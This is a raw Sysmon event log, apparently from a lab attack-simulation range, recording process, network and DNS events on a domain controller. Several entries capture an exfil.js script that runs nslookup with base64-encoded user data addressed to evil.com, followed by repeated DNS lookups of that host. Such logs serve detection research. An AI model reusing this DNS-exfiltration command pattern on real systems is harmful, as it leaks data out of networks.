10341000x8000000000000000217043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.141{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.141{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.141{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.141{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-E346-000000005F02}8128C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.141{2E1864BB-1904-629A-E146-000000005F02}73526052C:\Windows\system32\cmd.exe{2E1864BB-1904-629A-E346-000000005F02}8128C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.142{2E1864BB-1904-629A-E346-000000005F02}8128C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1904-629A-E146-000000005F02}7352C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgvhs.tmp 2>&1 10341000x8000000000000000217037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.126{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-E246-000000005F02}4836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.126{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-E246-000000005F02}4836C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.110{2E1864BB-1904-629A-E246-000000005F02}48365136C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-E146-000000005F02}7352C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000217034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.890{00000000-0000-0000-0000-000000000000}7952<unknown process>-udpfalsefalse127.0.0.1-51434-false127.0.0.1-53domain 354300x8000000000000000217033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.889{00000000-0000-0000-0000-000000000000}7952<unknown process>-udptruefalse127.0.0.1-51434-false127.0.0.1-53domain 354300x8000000000000000217032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.889{00000000-0000-0000-0000-000000000000}7952<unknown process>-udpfalsefalse127.0.0.1-51433-false127.0.0.1-53domain 354300x8000000000000000217031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.889{00000000-0000-0000-0000-000000000000}7952<unknown process>-udptruefalse127.0.0.1-51433-false127.0.0.1-53domain 354300x8000000000000000217030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.889{00000000-0000-0000-0000-000000000000}7952<unknown process>-udpfalsefalse127.0.0.1-51432-false127.0.0.1-53domain 354300x8000000000000000217029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.888{00000000-0000-0000-0000-000000000000}7952<unknown process>-udptruefalse127.0.0.1-51432-false127.0.0.1-53domain 354300x8000000000000000217028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.796{00000000-0000-0000-0000-000000000000}7196<unknown process>-udpfalsefalse127.0.0.1-51431-false127.0.0.1-53domain 354300x8000000000000000217027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.796{00000000-0000-0000-0000-000000000000}7196<unknown process>-udptruefalse127.0.0.1-51431-false127.0.0.1-53domain 354300x8000000000000000217026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.796{00000000-0000-0000-0000-000000000000}7196<unknown process>-udpfalsefalse127.0.0.1-51430-false127.0.0.1-53domain 354300x8000000000000000217025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.795{00000000-0000-0000-0000-000000000000}7196<unknown process>-udptruefalse127.0.0.1-51430-false127.0.0.1-53domain 354300x8000000000000000217024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.795{00000000-0000-0000-0000-000000000000}7196<unknown process>-udpfalsefalse127.0.0.1-51429-false127.0.0.1-53domain 354300x8000000000000000217023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.795{00000000-0000-0000-0000-000000000000}7196<unknown process>-udptruefalse127.0.0.1-51429-false127.0.0.1-53domain 354300x8000000000000000217022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.601{00000000-0000-0000-0000-000000000000}8104<unknown process>-udpfalsefalse127.0.0.1-51425-false127.0.0.1-53domain 354300x8000000000000000217021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.601{00000000-0000-0000-0000-000000000000}8104<unknown process>-udptruefalse127.0.0.1-51425-false127.0.0.1-53domain 354300x8000000000000000217020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.600{00000000-0000-0000-0000-000000000000}8104<unknown process>-udpfalsefalse127.0.0.1-51424-false127.0.0.1-53domain 354300x8000000000000000217019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.600{00000000-0000-0000-0000-000000000000}8104<unknown process>-udptruefalse127.0.0.1-51424-false127.0.0.1-53domain 354300x8000000000000000217018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.599{00000000-0000-0000-0000-000000000000}8104<unknown process>-udpfalsefalse127.0.0.1-51423-false127.0.0.1-53domain 354300x8000000000000000217017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.599{00000000-0000-0000-0000-000000000000}8104<unknown process>-udptruefalse127.0.0.1-51423-false127.0.0.1-53domain 354300x8000000000000000217016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.457{00000000-0000-0000-0000-000000000000}7608<unknown process>-udptruefalse127.0.0.1-51422-false127.0.0.1-53domain 354300x8000000000000000217015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.457{00000000-0000-0000-0000-000000000000}7608<unknown process>-udpfalsefalse127.0.0.1-51421-false127.0.0.1-53domain 354300x8000000000000000217014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.456{00000000-0000-0000-0000-000000000000}7608<unknown process>-udptruefalse127.0.0.1-51421-false127.0.0.1-53domain 354300x8000000000000000217013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.456{00000000-0000-0000-0000-000000000000}7608<unknown process>-udptruefalse127.0.0.1-51420-false127.0.0.1-53domain 354300x8000000000000000217012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.358{00000000-0000-0000-0000-000000000000}7548<unknown process>-udpfalsefalse127.0.0.1-51419-false127.0.0.1-53domain 10341000x8000000000000000217011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.110{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-E246-000000005F02}4836C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000217010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.358{00000000-0000-0000-0000-000000000000}7548<unknown process>-udptruefalse127.0.0.1-51419-false127.0.0.1-53domain 354300x8000000000000000217009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.357{00000000-0000-0000-0000-000000000000}7548<unknown process>-udpfalsefalse127.0.0.1-51418-false127.0.0.1-53domain 22542200x8000000000000000217008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.969{00000000-0000-0000-0000-000000000000}2328evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000217007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.357{00000000-0000-0000-0000-000000000000}7548<unknown process>-udptruefalse127.0.0.1-51418-false127.0.0.1-53domain 354300x8000000000000000217006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.357{00000000-0000-0000-0000-000000000000}7548<unknown process>-udptruefalse127.0.0.1-51417-false127.0.0.1-53domain 22542200x8000000000000000217005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.805{00000000-0000-0000-0000-000000000000}7920evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000217004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.277{00000000-0000-0000-0000-000000000000}644<unknown process>-udptruefalse127.0.0.1-51416-false127.0.0.1-53domain 22542200x8000000000000000217003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.627{00000000-0000-0000-0000-000000000000}2848evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.493{00000000-0000-0000-0000-000000000000}7340evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000217001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.276{00000000-0000-0000-0000-000000000000}644<unknown process>-udpfalsefalse127.0.0.1-51415-false127.0.0.1-53domain 10341000x8000000000000000217000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.108{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.108{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000216998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.276{00000000-0000-0000-0000-000000000000}644<unknown process>-udptruefalse127.0.0.1-51415-false127.0.0.1-53domain 22542200x8000000000000000216997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.400{00000000-0000-0000-0000-000000000000}7592evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000216996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.276{00000000-0000-0000-0000-000000000000}644<unknown process>-udpfalsefalse127.0.0.1-51414-false127.0.0.1-53domain 10341000x8000000000000000216995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.107{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.107{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000216993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.291{00000000-0000-0000-0000-000000000000}2632evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000216992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.107{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-E146-000000005F02}7352C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.105{2E1864BB-18E0-629A-6742-000000005F02}39765124C:\Windows\System32\WScript.exe{2E1864BB-1904-629A-E146-000000005F02}7352C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000216990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.276{00000000-0000-0000-0000-000000000000}644<unknown process>-udptruefalse127.0.0.1-51414-false127.0.0.1-53domain 22542200x8000000000000000216989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.160{00000000-0000-0000-0000-000000000000}4232evil.com0::ffff:127.0.0.1;<unknown process> 154100x8000000000000000216988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.106{2E1864BB-1904-629A-E146-000000005F02}7352C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgvhs.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000216987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.199{00000000-0000-0000-0000-000000000000}7316<unknown process>-udpfalsefalse127.0.0.1-51413-false127.0.0.1-53domain 22542200x8000000000000000216986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.029{00000000-0000-0000-0000-000000000000}6560evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000216985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.199{00000000-0000-0000-0000-000000000000}7316<unknown process>-udptruefalse127.0.0.1-51413-false127.0.0.1-53domain 354300x8000000000000000216984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.115{00000000-0000-0000-0000-000000000000}6168<unknown process>-udptruefalse127.0.0.1-51410-false127.0.0.1-53domain 354300x8000000000000000216983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.114{00000000-0000-0000-0000-000000000000}6168<unknown process>-udpfalsefalse127.0.0.1-51408-false127.0.0.1-53domain 22542200x8000000000000000216982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.886{00000000-0000-0000-0000-000000000000}7952evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000216981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.114{00000000-0000-0000-0000-000000000000}6168<unknown process>-udptruefalse127.0.0.1-51408-false127.0.0.1-53domain 22542200x8000000000000000216980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.798{00000000-0000-0000-0000-000000000000}7196evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000216979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.997{00000000-0000-0000-0000-000000000000}7360<unknown process>-udptruefalse127.0.0.1-51405-false127.0.0.1-53domain 23542300x8000000000000000216978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.089{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgprqd.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.073{2E1864BB-1904-629A-DF46-000000005F02}5196436C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-E046-000000005F02}3536C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 